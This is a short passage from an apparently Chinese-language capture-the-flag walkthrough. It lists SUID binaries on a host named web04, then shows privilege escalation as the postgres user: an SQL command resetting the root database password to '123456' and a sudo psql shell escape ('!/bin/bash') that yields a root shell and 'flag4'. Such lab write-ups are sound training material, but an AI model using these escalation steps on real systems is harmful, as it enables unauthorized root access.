/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
postgres@web04:/usr/local/pgsql/data$

psql提权

image-20250423171426657

改个密码

1
ALTER USER root WITH PASSWORD '123456'

直接sudo提权

image-20250423171554344

1
!/bin/bash

拿到flag4

image-20250423171719667